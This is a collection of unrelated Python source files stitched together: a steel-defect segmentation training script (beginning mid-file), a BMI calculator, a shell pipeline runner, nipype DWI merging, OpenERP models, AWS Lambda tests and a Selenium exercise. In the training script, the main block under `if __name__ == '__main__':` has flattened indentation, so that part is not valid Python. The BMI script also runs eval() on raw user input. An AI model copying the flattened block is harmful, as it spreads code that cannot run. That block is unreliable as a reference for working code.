        raise NotImplementedError
    return loss
def train_net(net, optimizer, device, args, LOG_FILE, MODEL_FILE):
    """
    Train *net* for args.epoch epochs; return (state_dict, history).

    Saves the best weights (by validation dice) to MODEL_FILE, logs one
    summary line per epoch to LOG_FILE, and optionally averages the
    weights of the last args.swa epochs (stochastic weight averaging).

    Relies on module globals: trainloader, validloader, TRAIN_FILES,
    VALID_FILES. NOTE(review): indentation reconstructed from a
    flattened source; confirm block boundaries against the original.
    """
    # output regression information
    history = {'Train_loss':[], 'Train_dice':[], 'Train_other':[], 'Valid_loss':[], 'Valid_dice':[], 'Valid_other':[]}
    # scheduler (args.sch == 0 means constant learning rate)
    if args.sch == 1:
        scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones = [args.epoch//2, args.epoch*3//4], gamma = 0.35)
    elif args.sch == 2:
        scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, args.epoch, 1e-4)
    val_dice_best = -float('inf')
    # main iteration
    for epoch in range(args.epoch): # loop over the dataset multiple times
        net.train()
        running_loss, running_dice, running_other = 0.0, 0.0, 0.0
        tk0 = tqdm(enumerate(trainloader), total = len(trainloader), leave = False)
        # zero the gradient
        optimizer.zero_grad()
        # iterate over all samples
        for i, data in tk0:
            # get the inputs; data is a list of [inputs, labels]
            images = data[0].to(device).permute(0, 3, 1, 2)
            # forward + backward + optimize
            outputs = net(images)
            # do not accumulate the gradient
            if not args.accumulate:
                # different ways of handling the outputs
                loss = compute_loss(args, outputs, data, acc_step = 1)
                loss.backward()
                optimizer.step()
                optimizer.zero_grad()
                batch_loss = loss.item()
            # do accumulation
            else:
                # step only every acc_step mini-batches (effective batch 64)
                acc_step = 64//args.batch
                loss = compute_loss(args, outputs, data, acc_step = acc_step)
                loss.backward()
                if (i+1)%acc_step == 0:
                    optimizer.step()
                    optimizer.zero_grad()
                batch_loss = loss.item() * acc_step
            # print statistics
            batch_dice, batch_other = evaluate_batch(data, outputs, args)
            running_loss += batch_loss
            running_dice += batch_dice
            running_other += batch_other
            tk0.set_postfix(info = 'Loss {:.3f}, Dice {:.3f}, Other {:.3f}'.format(batch_loss, batch_dice, batch_other))
        # stochastic weight averaging over the final args.swa epochs
        if args.swa > 0 and epoch >= args.epoch-args.swa:
            epoch_tmp = args.epoch-args.swa
            if epoch == epoch_tmp:
                net_swa = copy.deepcopy(net.state_dict())
            else:
                # running average of the weights collected so far
                for key, val in net_swa.items():
                    net_swa[key] = ((epoch-epoch_tmp)*val+net.state_dict()[key])/(epoch-epoch_tmp+1)
        # after every epoch, print the statistics
        net.eval()
        val_loss, val_dice, val_other = evaluate_loader(net, device, validloader, args)
        # save the best up to now
        if val_dice > val_dice_best:
            print('Improving val_dice from {:.3f} to {:.3f}, saving the model'.format(val_dice_best/len(VALID_FILES)/args.category, val_dice/len(VALID_FILES)/args.category))
            val_dice_best = val_dice
            torch.save(net.state_dict(),MODEL_FILE)
        # update the learning rate
        if args.sch > 0:
            scheduler.step()
        # update the history and output message
        history['Train_loss'].append(running_loss / len(trainloader))
        history['Valid_loss'].append(val_loss / len(validloader))
        history['Train_dice'].append(running_dice / len(TRAIN_FILES) / args.category) # four categories
        history['Valid_dice'].append(val_dice / len(VALID_FILES) / args.category)
        history['Train_other'].append(running_other / len(TRAIN_FILES) / args.category)
        history['Valid_other'].append(val_other / len(VALID_FILES) / args.category)
        sout = '\nEpoch {:d} :'.format(epoch)+' '.join(key+':{:.3f}'.format(val[-1]) for key,val in history.items())
        print2file(sout, LOG_FILE)
        print(sout)
    # return the SWA-averaged weights when SWA was used, else the final weights
    if args.swa > 0:
        return net_swa, history
    else:
        return net.state_dict(), history
if __name__ == '__main__':
# argsparse
parser = argparse.ArgumentParser()
parser.add_argument('--normalize', action = 'store_true', default = False, help = 'Normalize the images or not')
parser.add_argument('--accumulate', action = 'store_false', default = True, help = 'Not doing gradient accumulation or not')
parser.add_argument('--bayes_opt', action = 'store_true', default = False, help = 'Do Bayesian optimization in finding hyper-parameters')
parser.add_argument('-l','--load_mod',action = 'store_true', default = False, help = 'Load a pre-trained model')
parser.add_argument('-t','--test_run',action = 'store_true', default = False, help = 'Run the script quickly to check all functions')
parser.add_argument('--sampler', action = 'store_true', default = False, help = 'Use sampler in the algorithm.')
parser.add_argument('--evaluate', action = 'store_false', default = True, help = 'Evaluate the third category only.')
parser.add_argument('--conservative', action = 'store_true', default = False, help = 'Use conservative augmentations.')
parser.add_argument('--use_weight', action = 'store_true', default = False, help = 'Use weights in evaluation.')
parser.add_argument('--wlovasz', type = float,default = 0.2, help = 'The weight used in Lovasz loss')
parser.add_argument('--augment', type = int, default = 0, help = 'The type of train augmentations: 0 vanilla, 1 add contrast, 2 add ')
parser.add_argument('--loss', type = int, default = 0, help = 'The loss: 0 BCE vanilla; 1 wbce+dice; 2 wbce+lovasz.')
parser.add_argument('--sch', type = int, default = 2, help = 'The schedule of the learning rate: 0 step; 1 cosine annealing; 2 cosine annealing with warmup.')
parser.add_argument('-m', '--model', type = str, default = 'resnet34', help = 'The backbone network of the neural network.')
parser.add_argument('-e', '--epoch', type = int, default = 5, help = 'The number of epochs in the training')
parser.add_argument('--height', type = int, default = 256, help = 'The height of the image')
parser.add_argument('--width', type = int, default = 1600, help = 'The width of the image')
parser.add_argument('--category', type = int, default = 4, help = 'The category of the problem')
parser.add_argument('-b', '--batch', type = int, default = 8, help = 'The batch size of the training')
parser.add_argument('-s','--swa', type = int, default = 4, help = 'The number of epochs for stochastic weight averaging')
parser.add_argument('-o','--output', type = int, default = 2, help = 'The type of the network, 0 vanilla, 1 add regression, 2 add classification.')
parser.add_argument('--seed', type = int, default = 1234, help = 'The random seed of the algorithm.')
parser.add_argument('--sample_times',type = int, default = 1, help = 'The sampling times of sampler.')
parser.add_argument('--sample_ratio',type = float,default = 0.4, help = 'The sampling ratio of the third class.')
args = parser.parse_args()
seed_everything(seed = args.seed)
print('===========================')
for key, val in vars(args).items():
print('{}: {}'.format(key, val))
print('===========================\n')
# input folder paths
TRAIN_PATH = '../input/severstal-steel-defect-detection/train_images/'
TEST_PATH = '../input/severstal-steel-defect-detection/test_images/'
TRAIN_MASKS = '../input/severstal-steel-defect-detection/train.csv'
# ouput folder paths
dicSpec = {'m_':args.model, 'con_':int(args.conservative),'r_':int(10*args.sample_ratio), 's_':int(args.sampler), 'e_':args.epoch, 'sch_':args.sch, 'loss_':args.loss}
strSpec = '_'.join(key+str(val) for key,val in dicSpec.items())
VALID_ID_FILE = '../output/validID_{:s}.csv'.format(strSpec)
MODEL_FILE = '../output/model_{:s}.pth'.format(strSpec)
MODEL_SWA_FILE= '../output/model_swa_{:s}.pth'.format(strSpec)
HISTORY_FILE = '../output/history_{:s}.csv'.format(strSpec)
LOG_FILE = '../output/log_{:s}.txt'.format(strSpec)
# rewrite the file if not load mod
if not args.load_mod:
with open(LOG_FILE, 'w') as fopen:
fopen.write(strSpec+'\n')
# find all files in the directory
TRAIN_FILES_ALL = sorted(glob.glob(TRAIN_PATH+'*.jpg'))
TEST_FILES = sorted(glob.glob(TEST_PATH+'*.jpg'))
# read in the masks
mask_df = pd.read_csv(TRAIN_MASKS).set_index(['ImageId_ClassId']).fillna('-1')
print(mask_df.head())
print('===========================\n')
########################################################################
# if test run a small version
if args.test_run:
rows = 32
else:
rows = len(TRAIN_FILES_ALL)
# load validation id
X_valid = list(pd.read_csv('validID.csv')['Valid'])[:rows]
X_train = list(set(np.arange(len(TRAIN_FILES_ALL))) - set(X_valid))[:rows]
# get the train and valid files
TRAIN_FILES = [TRAIN_FILES_ALL[i] for i in X_train]
VALID_FILES = [TRAIN_FILES_ALL[i] for i in X_valid]
steel_ds_valid = SteelDataset(VALID_FILES, args, mask_df = mask_df)
stat_df_valid = steel_ds_valid.stat_images(rows)
# print statistics
sout = '======== Validation Stat ==========\n' + analyze_labels(stat_df_valid)+'\n'
print2file(sout, LOG_FILE)
# not using sophisticated normalize
if not args.normalize:
train_mean, train_std = 0, 1
test_mean, test_std = 0, 1
else:
train_mean, train_std = 0.3438812517320016, 0.056746666005067205
test_mean, test_std = 0.25951299299868136, 0.051800296725619116
sout = 'Train/Test {:d}/{:d}\n'.format(len(TRAIN_FILES_ALL), len(TEST_FILES)) + \
'Train mean/std {:.3f}/{:.3f}\n'.format(train_mean, train_std) + \
'Test mean/std {:.3f}/{:.3f}\n'.format(test_mean, test_std) +\
'Train num/sample {:d}'.format(len(TRAIN_FILES)) + ' '.join(TRAIN_FILES[:2]) + \
'\nValid num/sample {:d}'.format(len(VALID_FILES)) + ' '.join(VALID_FILES[:2])+'\n'
print2file(sout, LOG_FILE)
########################################################################
# Augmentations
# NOTE(review): Compose/Flip/ShiftScaleRotate/Normalize/ToFloat look like
# albumentations transforms — confirm against the imports at the top of
# this file.
augment_train = Compose([
    Flip(p=0.5), # Flip vertically or horizontally or both
    ShiftScaleRotate(rotate_limit = 10, p = 0.3),
    RandomBrightnessContrast(p = 0.3),
    # Same scalar mean/std replicated across the 3 channels.
    Normalize(mean = (train_mean, train_mean, train_mean), std = (train_std, train_std, train_std)),
    ToFloat(max_value=1.)],p=1)
# validation: no geometric/photometric augmentation, only normalization
augment_valid = Compose([
    Normalize(mean=(train_mean, train_mean, train_mean), std=(train_std, train_std, train_std)),
    ToFloat(max_value=1.)],p=1)
# normal prediction: uses the test-set statistics
augment_test = Compose([
    Normalize(mean=(test_mean, test_mean, test_mean), std=(test_std, test_std, test_std)),
    ToFloat(max_value=1.)],p=1)
########################################################################
# do some simple checking (only on --test_run)
if args.test_run:
    # check rle2mask and mask2rle round-trip: every non-empty RLE string
    # should survive decode->encode unchanged; offenders are printed.
    mask_df = pd.read_csv(TRAIN_MASKS).set_index(['ImageId_ClassId']).fillna('-1')
    for i, pixel in enumerate(mask_df['EncodedPixels']):
        if pixel != '-1':
            rle_pass = mask2rle(rle2mask(pixel, 1600, 256))
            if rle_pass != pixel:
                print(i)
    # check dataloader: one raw dataset and two augmented variants
    steel_ds = SteelDataset(TRAIN_FILES, args, mask_df = mask_df)
    steel_ds_train = SteelDataset(TRAIN_FILES, args, mask_df = mask_df, augment = augment_train)
    steel_ds_valid = SteelDataset(VALID_FILES, args, mask_df = mask_df, augment = augment_valid)
    res = steel_ds_train[1]
    image, mask = res[0], res[1]
    print(image.shape, image.min(), image.max())
    print(mask.shape, mask.min(), mask.max())
    res = steel_ds_valid[1]
    image, mask = res[0], res[1]
    print(image.shape, image.min(), image.max())
    print(mask.shape, mask.min(), mask.max())
    # check on the images: plot raw vs augmented samples side by side.
    nplot = 4
    fig, axs = plt.subplots(nplot, 2, figsize=(16,nplot*2))
    for i in range(nplot):
        # divmod(i, 2) -> (row, col) index into the 2-column axes grid
        ax = axs[divmod(i, 2)]
        ax.axis('off')
        plot_mask(*steel_ds[i][:2], ax)
        ax = axs[divmod(i + nplot, 2)]
        plot_mask(*steel_ds_train[i][:2], ax)
        ax.axis('off')
    plt.savefig('../output/Dataset_augment.png')
########################################################################
# Prepare dataset -> dataloader
# create the data set
steel_ds_train = SteelDataset(TRAIN_FILES, args, mask_df = mask_df, augment = augment_train)
steel_ds_valid = SteelDataset(VALID_FILES, args, mask_df = mask_df, augment = augment_valid)
# create the dataloader; optionally balance classes with a custom sampler
if args.sampler:
    train_sampler = BalanceClassSamplerMultilabel(steel_ds_train, args)
    # drop_last=True keeps batch sizes uniform for the sampler path
    trainloader = torch.utils.data.DataLoader(steel_ds_train,
        batch_size = args.batch, num_workers = 4,
        sampler = train_sampler, drop_last = True,)
else:
    trainloader = torch.utils.data.DataLoader(steel_ds_train, batch_size = args.batch, shuffle = True, num_workers = 4)
# validation is never shuffled so metrics are reproducible
validloader = torch.utils.data.DataLoader(steel_ds_valid, batch_size = args.batch, shuffle = False, num_workers = 4)
# cpu or gpu
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# checking the dataloader: pull a single batch and report shapes/ranges
if args.test_run:
    data = next(iter(trainloader))
    inputs, labels = data[0].to(device), data[1].to(device)
    print(inputs.shape, inputs.min(), inputs.max(), inputs.dtype)
    print(labels.shape, labels.min(), labels.max(), labels.dtype)
########################################################################
# Model
# NOTE(review): if args.model is neither 'resnet34' nor 'se_resnet50',
# `net` is never bound and the lines below raise NameError — confirm the
# argument parser restricts the choices.
if args.model == 'resnet34' or args.model == 'se_resnet50':
    net = Unet(args.model, encoder_weights = "imagenet", classes = 4, activation = None, args = args).to(device) # pass model specification to the resnet32
########################################################################
# optimizer
# if args.optim == 'adam':
optimizer = optim.Adam(net.parameters(), lr = 0.001)
########################################################################
# Train the network (or load a previously trained checkpoint)
seed_everything(seed = args.seed)
if args.load_mod:
    # empty history placeholder so the plotting code below still runs
    history = {'Train_loss':[], 'Train_dice':[], 'Valid_loss':[], 'Valid_dice':[]}
    net.load_state_dict(torch.load(MODEL_FILE))
else:
    net_swa, history = train_net(net, optimizer, device, args, LOG_FILE, MODEL_FILE)
    # save the stochastic-weight-averaged model separately
    torch.save(net_swa, MODEL_SWA_FILE)
# save the final result
print('Finished Training')
history_df = pd.DataFrame(history)
history_df.to_csv(HISTORY_FILE)
# torch.save(net.state_dict(),MODEL_FILE)
# show the curve: loss on the left, dice on the right
fig, axs = plt.subplots(1,2,figsize=(16,4))
axs[0].plot(history['Train_loss'], label = 'Train Loss')
axs[0].plot(history['Valid_loss'], label = 'Valid Loss')
axs[0].legend();axs[0].grid()
axs[0].set_title('Loss')
axs[1].plot(history['Train_dice'], label = 'Train Dice')
axs[1].plot(history['Valid_dice'], label = 'Valid Dice')
axs[1].legend();axs[1].grid()
axs[1].set_title('Dice')
plt.savefig('../output/loss_dice.png')
########################################################################
# Evaluate the network
# get all predictions of the validation set: maybe a memory error here.
if args.load_mod:
    # load the best model (re-load even though it was loaded above, so the
    # evaluation always runs against the checkpoint on disk)
    net.load_state_dict(torch.load(MODEL_FILE))
eva = Evaluate(net, device, validloader, args, isTest = False)
# search_parameter presumably tunes per-class thresholds — confirm in Evaluate
eva.search_parameter()
dice, dicPred, dicSubmit = eva.predict_dataloader()
# eva.plot_sampled_predict()
# evaluate the prediction
sout = '\nFinal Dice {:.3f}\n'.format(dice) +\
    '==============Predict===============\n' + \
    analyze_labels(pd.DataFrame(dicPred)) # +\
# '==============True===============\n' + \
# analyze_labels(stat_df_valid)
# print(sout)
# print2file(sout, LOG_FILE)
# print2file(' '.join(str(key)+':'+str(val) for key,val in eva.dicPara.items()), LOG_FILE)
# load swa model (disabled)
# net.load_state_dict(torch.load(MODEL_SWA_FILE))
# eva = Evaluate(net, device, validloader, args, isTest = False)
# eva.search_parameter()
# dice, dicPred, dicSubmit = eva.predict_dataloader()
# eva.plot_sampled_predict()
# evaluate the prediction
# sout = '\n\nFinal SWA Dice {:.3f}\n'.format(dice/len(VALID_FILES)/4) +\
#     '==============SWA Predict===============\n' + \
#     analyze_labels(pd.DataFrame(dicPred)) + \
#     '==============True===============\n' + \
#     analyze_labels(stat_df_valid)
# print(sout)
# print2file(sout, LOG_FILE)
# print2file(','.join('"'+str(key)+'":'+str(val) for key,val in eva.dicPara.items()), LOG_FILE)
|
from numpy import *


def classify(imc):
    """Return the weight-category label for an IMC (BMI) value.

    BUG FIX: the original chain ended with ``elif(max(b)<40)`` printing
    'OBESIDADE MORBIDA', so values >= 40 printed nothing while values just
    under 40 were misclassified. The original bands also had gaps (exactly
    17, 18.49-18.5, 24.99-25, 29.99-30, 34.99-35, 39.99-40 matched no
    branch); the half-open bands below cover every value.
    """
    if imc < 17:
        return "MUITO BAIXO DO PESO"
    elif imc < 18.5:
        return "ABAIXO DO PESO"
    elif imc < 25:
        return "PESO NORMAL"
    elif imc < 30:
        return "ACIMA DO PESO"
    elif imc < 35:
        return "OBESIDADE"
    elif imc < 40:
        return "OBESIDADE SEVERA"
    else:
        return "OBESIDADE MORBIDA"


def main():
    """Read mass and height lists, print each IMC, the maximum and its class."""
    # NOTE: eval() on raw user input — acceptable only for a trusted
    # classroom exercise; never use on untrusted input.
    p = array(eval(input("MASSA: ")))
    a = array(eval(input("alt: ")))
    # IMC = mass / height^2, rounded to 2 decimals (vectorized)
    b = around(p / a ** 2, 2)
    print(b)
    print("O MAIOR IMC DA TURMA EH", max(b))
    print(classify(max(b)))


if __name__ == '__main__':
    main()
#!/usr/bin/env python3
from networkx import DiGraph
from os import getpid, getppid, execvpe, environ, fork, waitpid
from os import open as os_open, pipe, dup2, close, set_inheritable
from os import O_RDONLY, O_WRONLY
from sys import argv
noread = os_open('/dev/null', O_RDONLY)
nowrite = os_open('/dev/null', O_WRONLY)
set_inheritable(noread, True)
set_inheritable(nowrite, True)
shell = environ.get('SHELL', '/bin/sh')
class Pipe:
    """A unidirectional OS pipe; ``read``/``write`` hold the two descriptors."""

    def __init__(self):
        fds = pipe()
        self.read = fds[0]
        self.write = fds[1]

    def __repr__(self):
        return f'Pipe(read={self.read}, write={self.write})\n{hex(id(self))}'
class Command:
    """A shell command to be run in a forked child with redirected fds.

    ifds/ofds are lists of (fd, isdata, name) triples; "data" fds are
    dup2'd onto stdin/stdout, all fds are exported to the child via
    NAME_IN / NAME_OUT environment variables.
    """
    def __init__(self, command, ifds=[], ofds=[], env={}):
        # NOTE: the mutable defaults are safe here because they are copied
        # via list()/dict-unpacking before being stored.
        self.command = command
        self.ifds, self.ofds = list(ifds), list(ofds)
        self.pid = None
        # Defaults point the control channel at /dev/null descriptors.
        self.env = {'TF_DATA_IN':'0', 'TF_DATA_OUT':'1',
                    'TF_CTRL_IN':f'{noread}', 'TF_CTRL_OUT':f'{nowrite}', **env, }
    def __repr__(self):
        return f'Command({self.command!r})\n{hex(id(self))}'
    def close_fds(self):
        # Close our copies of the write ends so readers see EOF; ignore
        # descriptors that were already closed.
        for fd, _, _ in self.ofds:
            try: close(fd)
            except OSError: pass
    def __call__(self):
        """Fork; parent returns the child pid, child execs the command."""
        self.pid = fork()
        if self.pid:
            return self.pid
        # --- child process from here on ---
        for ifd, isdata, name in self.ifds:
            set_inheritable(ifd, True)
            if isdata:
                # data input becomes the child's stdin
                dup2(ifd, 0)
            self.env[f'{name}_IN'] = str(ifd)
        for ofd, isdata, name in self.ofds:
            set_inheritable(ofd, True)
            if isdata:
                # data output becomes the child's stdout
                dup2(ofd, 1)
            self.env[f'{name}_OUT'] = str(ofd)
        env = {**environ, **self.env}
        # replace the child image with `$SHELL -c command`
        execvpe(shell, [shell, '-c', self.command], env)
class Tee:
    """Fan-out node: forks a `tee` process copying one input fd to many outputs."""
    def __init__(self, ifds=[], ofds=[]):
        # Mutable defaults are copied before storing, so they are safe.
        self.ifds, self.ofds = list(ifds), list(ofds)
        self.pid = None
    def __repr__(self):
        return f'Tee({self.ifds!r}, {self.ofds!r})\n{hex(id(self))}'
    def close_fds(self):
        # Close parent copies of the write ends so downstream readers get EOF.
        for fd, _, _ in self.ofds:
            try: close(fd)
            except OSError: pass
    def __call__(self):
        """Fork; parent returns the child pid, child execs `tee`."""
        self.pid = fork()
        if self.pid:
            return self.pid
        # --- child: wire the (single expected) input fd to stdin ---
        for ifd, _, _ in self.ifds:
            set_inheritable(ifd, True)
            dup2(ifd, 0)
        for ofd, _, _ in self.ofds:
            set_inheritable(ofd, True)
        # Address each output fd through /proc so tee can open it by path;
        # tee's own stdout is discarded.
        args = [f'/proc/self/fd/{ofd}' for ofd, _, _ in self.ofds]
        command = f'tee {" ".join(args)} >/dev/null'
        execvpe(shell, [shell, '-c', command], environ)
def create_xgraph(graph, nodes, isdata, name):
    """Expand a command graph into an execution graph wired with pipes.

    graph:  DiGraph over user nodes; nodes: mapping user node -> Command.
    Nodes with fan-out get a Tee inserted after them. Every edge is then
    realized as a Pipe whose fds are appended to the endpoints' ofds/ifds
    as (fd, isdata, name) triples. Returns the expanded DiGraph.
    """
    xgraph = DiGraph()
    for u in graph.nodes():
        xgraph.add_node(nodes[u])
        if graph.out_degree(u) > 1:
            # fan-out: route u's single output through a Tee
            t = Tee()
            xgraph.add_node(t)
            xgraph.add_edge(nodes[u], t)
            for v in graph.successors(u):
                xgraph.add_edge(t, nodes[v])
        else:
            for v in graph.successors(u):
                xgraph.add_edge(nodes[u], nodes[v])
    pipes = {}
    pgraph = DiGraph()
    for u in xgraph.nodes():
        pgraph.add_node(u)
        for v in xgraph.successors(u):
            if (u, v) not in pipes:
                p = Pipe()
                # Fan-in: all predecessors of v deliberately share ONE pipe,
                # so v reads the merged stream on a single descriptor.
                for n in xgraph.predecessors(v):
                    pipes[n, v] = p
            p = pipes[u, v]
            pgraph.add_edge(u, p)
            pgraph.add_edge(p, v)
    for u, v in xgraph.edges():
        p = pipes[u, v]
        u.ofds.append((p.write, isdata, name))
        v.ifds.append((p.read, isdata, name))
    return xgraph
def run(data_graph, *extra_graphs, filename=''):
    """Launch every command/tee in the graphs and reap them as they exit.

    data_graph edges become stdin/stdout pipes (TF_DATA); extra_graphs
    become auxiliary fd channels (TF_CTRL). `filename` is currently unused.
    """
    nodes = {n: Command(n.contents) for n in data_graph.nodes()}
    data_xgraph = create_xgraph(data_graph, nodes, isdata=True, name='TF_DATA')
    extra_xgraphs = [create_xgraph(g, nodes, isdata=False, name='TF_CTRL')
                     for g in extra_graphs]
    all_nodes = set(data_xgraph.nodes())
    for xg in extra_xgraphs:
        all_nodes.update(xg.nodes())
    # calling node() forks/execs the process; map child pid -> node
    pids = {node(): node for node in all_nodes}
    # in the parent: wait for all children
    while pids:
        pid, rc = waitpid(-1, 0)
        if pid in pids:
            # close our write ends so downstream readers eventually see EOF
            pids[pid].close_fds()
            del pids[pid]
|
# ---------------------- homework_9 ------------------------
def snake_style_converter(phrase):
    """Print the CamelCase form of a snake_case string.

    Splits *phrase* on underscores, capitalizes each fragment and prints
    the joined result. If *phrase* is not a string (no .split attribute),
    an error message is printed instead of raising.
    """
    try:
        fragments = phrase.split("_")
    except AttributeError:
        print("\n\tERROR:\n\tType of variable given to func. was wrong, it`s should be string")
        return
    print(''.join(fragment.capitalize() for fragment in fragments))
# Demo: convert two sample snake_case strings to CamelCase.
print("\nSnake style string: 'employee_first_name_and_second_name'\nTransforms into a Camel case string:")
snake_style_converter("employee_first_name_and_second_name")
snake_style_converter("another_example")
|
"""Handle merging and spliting of DSI files."""
import numpy as np
from nipype.interfaces import afni
import os.path as op
from nipype.interfaces.base import (BaseInterfaceInputSpec, TraitedSpec, File, SimpleInterface,
InputMultiObject, traits)
from nipype.utils.filemanip import fname_presuffix
import nibabel as nb
class MergeDWIsInputSpec(BaseInterfaceInputSpec):
    """Inputs for MergeDWIs: parallel lists of dwi images and their gradient files."""
    dwi_files = InputMultiObject(
        File(exists=True), mandatory=True, desc='list of dwi files')
    bids_dwi_files = InputMultiObject(
        File(exists=True), mandatory=True, desc='list of original (BIDS) dwi files')
    bval_files = InputMultiObject(
        File(exists=True), mandatory=True, desc='list of bval files')
    bvec_files = InputMultiObject(
        File(exists=True), mandatory=True, desc='list of bvec files')
class MergeDWIsOutputSpec(TraitedSpec):
    """Outputs of MergeDWIs: merged image, gradient tables and provenance."""
    out_dwi = File(desc='the merged dwi image')
    # BUG FIX: the bval/bvec descriptions were swapped in the original.
    out_bval = File(desc='the merged bval file')
    out_bvec = File(desc='the merged bvec file')
    # one source BIDS image path per output volume
    original_images = traits.List()
class MergeDWIs(SimpleInterface):
    """Concatenate multiple DWI series (and their bvals/bvecs) into one.

    With a single input file everything is passed through unchanged; with
    several, images are merged with AFNI 3dTCat and the gradient tables
    are stacked to match.
    """
    input_spec = MergeDWIsInputSpec
    output_spec = MergeDWIsOutputSpec

    def _run_interface(self, runtime):
        bvals = self.inputs.bval_files
        bvecs = self.inputs.bvec_files

        def get_nvols(img):
            # number of volumes; a 3D image counts as one volume
            shape = nb.load(img).shape
            if len(shape) < 4:
                return 1
            return shape[3]

        if len(self.inputs.dwi_files) > 1:
            # merge images along time with AFNI TCat
            dwimrg = afni.TCat(in_files=self.inputs.dwi_files, outputtype='NIFTI_GZ')
            merged_fname = dwimrg.run().outputs.out_file
            self._results['out_dwi'] = merged_fname
            # derive bval/bvec names from the merged image, in the working dir
            out_bvec = fname_presuffix(merged_fname, suffix=".bvec", use_ext=False,
                                       newpath=runtime.cwd)
            out_bval = fname_presuffix(merged_fname, suffix=".bval", use_ext=False,
                                       newpath=runtime.cwd)
            self._results['out_bval'] = combine_bvals(bvals, output_file=out_bval)
            self._results['out_bvec'] = combine_bvecs(bvecs, output_file=out_bvec)
            # record one BIDS source path per output volume
            sources = []
            for img in self.inputs.bids_dwi_files:
                sources += [img] * get_nvols(img)
            self._results['original_images'] = sources
        else:
            # single input: pass files through untouched
            dwi_file = self.inputs.dwi_files[0]
            bids_dwi_file = self.inputs.bids_dwi_files[0]
            self._results['out_dwi'] = dwi_file
            self._results['out_bval'] = bvals[0]
            self._results['out_bvec'] = bvecs[0]
            self._results['original_images'] = [bids_dwi_file] * get_nvols(bids_dwi_file)
        return runtime
def combine_bvals(bvals, output_file="restacked.bval"):
    """Load, merge and save fsl-style bvals files.

    Each input file is loaded as a 1-D array (scalars promoted to length-1)
    and all values are concatenated into *output_file* as integers.
    Returns the absolute path of the written file.
    """
    loaded = [np.atleast_1d(np.loadtxt(bval_file)) for bval_file in bvals]
    np.savetxt(output_file, np.concatenate(loaded), fmt=str("%i"))
    return op.abspath(output_file)
def combine_bvecs(bvecs, output_file="restacked.bvec"):
    """Load, merge and save fsl-style bvecs files.

    Inputs are 3xN (or length-3) arrays; they are stacked column-wise so
    the output stays 3 rows by total-volumes columns, written with 8
    decimal places. Returns the absolute path of the written file.
    """
    stacked = np.column_stack([np.loadtxt(bvec_file) for bvec_file in bvecs])
    np.savetxt(output_file, stacked, fmt=str("%.8f"))
    return op.abspath(output_file)
|
# coding: utf-8
import math
from osv import fields,osv
import tools
import pooler
from tools.translate import _
class res_partner_syndicate_ext(osv.osv):
    """Extend res.partner with a flag marking the partner as a syndicate."""
    _inherit = 'res.partner'
    _columns = {
        'syndicate': fields.boolean('Sindicato', help="Check this box if the partner is a syndicate."),
    }
# legacy OpenERP pattern: instantiating the class registers the model
res_partner_syndicate_ext()
class hr_syndicate_br(osv.osv):
    """Extend hr.employee with a many2many link to syndicate registrations."""
    _inherit = 'hr.employee'
    _columns = {
        'syndicate_rel': fields.many2many('hr.syndicate.br.reg', 'hr_syndicate_br_rel2', 'cpf', 'name', 'Sindicato'),
    }
# legacy OpenERP pattern: instantiating the class registers the model
hr_syndicate_br()
class hr_syndicate_br_reg(osv.osv):
    """Syndicate registration record: reference, period, syndicate partner and amount."""
    _name = 'hr.syndicate.br.reg'
    _columns = {
        'reference': fields.integer('Referencia'),
        'periodo': fields.date('Período'),
        # only partners flagged as syndicates can be selected
        'syndicate_opt': fields.many2one('res.partner', 'Sindicato', domain="[('syndicate','=',1)]"),
        'importancia': fields.float('Importância')
    }
# legacy OpenERP pattern: instantiating the class registers the model
hr_syndicate_br_reg()
import boto3
import StringIO
import json
import re
from nose.tools import assert_equals
class TestNumberOfColumns:
    """Integration tests (Python 2 / nose) for the 'NumberOfColumns' AWS Lambda.

    Each test builds a JSON payload describing a file in the
    'narp-archive' bucket and invokes the live Lambda — these tests
    require AWS credentials and network access.
    """
    def __init__(self):
        self.lam = None
    def setup(self):
        # nose calls this before each test
        self.lam = boto3.client('lambda')
    def json_file(self, line_delimiter='\n', field_delimiter='\t', target_file="out_file_1.txt.gz"):
        """Return a file-like JSON payload for the Lambda invocation."""
        payload = {
            "LineDelimiter": line_delimiter,
            "FieldDelimiter": field_delimiter,
            "Bucket": 'narp-archive',
            "Prefix": target_file
        }
        return StringIO.StringIO( json.dumps(payload))
    def payload(self, resp):
        """Decode the Lambda's JSON response payload."""
        return json.loads( resp['Payload'].read() )
    def successful_call(self, resp):
        assert_equals( resp['StatusCode'], 200 )
        assert( 'FunctionError' not in resp )
    def test_when_tab_field_delimiter(self):
        resp = self.lam.invoke( FunctionName='NumberOfColumns', Payload=self.json_file() )
        self.successful_call(resp)
        assert_equals( self.payload(resp), 7)
    def test_when_tab_field_and_cr_row_delimiter(self):
        resp = self.lam.invoke( FunctionName='NumberOfColumns', Payload=self.json_file("\r", "\t", "out_file_2_cr.txt.gz") )
        self.successful_call(resp)
        assert_equals( self.payload(resp), 4)
    def test_when_referencing_non_existent_file(self):
        resp = self.lam.invoke( FunctionName='NumberOfColumns', Payload=self.json_file("\r", "\t", "non_existent_file.txt.gz") )
        assert( 'FunctionError' in resp )
        assert( re.search( 'The target .+ does not exist.', self.payload(resp)['errorMessage'] ))
    def test_when_using_delimiters_that_dont_exist_in_file(self):
        # with no matching delimiters the function is expected to hit its timeout
        resp = self.lam.invoke( FunctionName='NumberOfColumns', Payload=self.json_file("\r\n", "\r\n", "out_file_1.txt.gz"))
        assert( 'FunctionError' in resp )
        mess = self.payload(resp)['errorMessage']
        assert( re.search( 'Task timed out after 10.00 seconds', mess ) is not None )
|
"""
:summary This is python 3.7 supported selenium 3.141.0
:since January 2020
:author Sathya Sai M
:keyword Python, selenium basics conditionalcommands
"""
import time
from selenium import webdriver
class Conditional:
    """Selenium exercise: register then log in on a locally hosted app.

    Requires chromedriver at ../Drivers/chromedriver.exe and the target app
    running on localhost:8085; the time.sleep calls are only to make the
    browser actions visible while learning.
    """
    def conditional(self):
        driver = webdriver.Chrome(executable_path="../Drivers/chromedriver.exe") # opens the chrome driver
        driver.get("http://localhost:8085/register") # opens the link
        # demonstrate the conditional commands is_displayed()/is_enabled()
        email = driver.find_element_by_name("email_id")
        print(email.is_displayed())
        print(email.is_enabled())
        user = driver.find_element_by_name("username")
        print(user.is_displayed())
        print(user.is_enabled())
        passw = driver.find_element_by_name("password")
        print(passw.is_displayed())
        print(passw.is_enabled())
        # fill in and submit the registration form
        email.send_keys("prem@gmail.com")
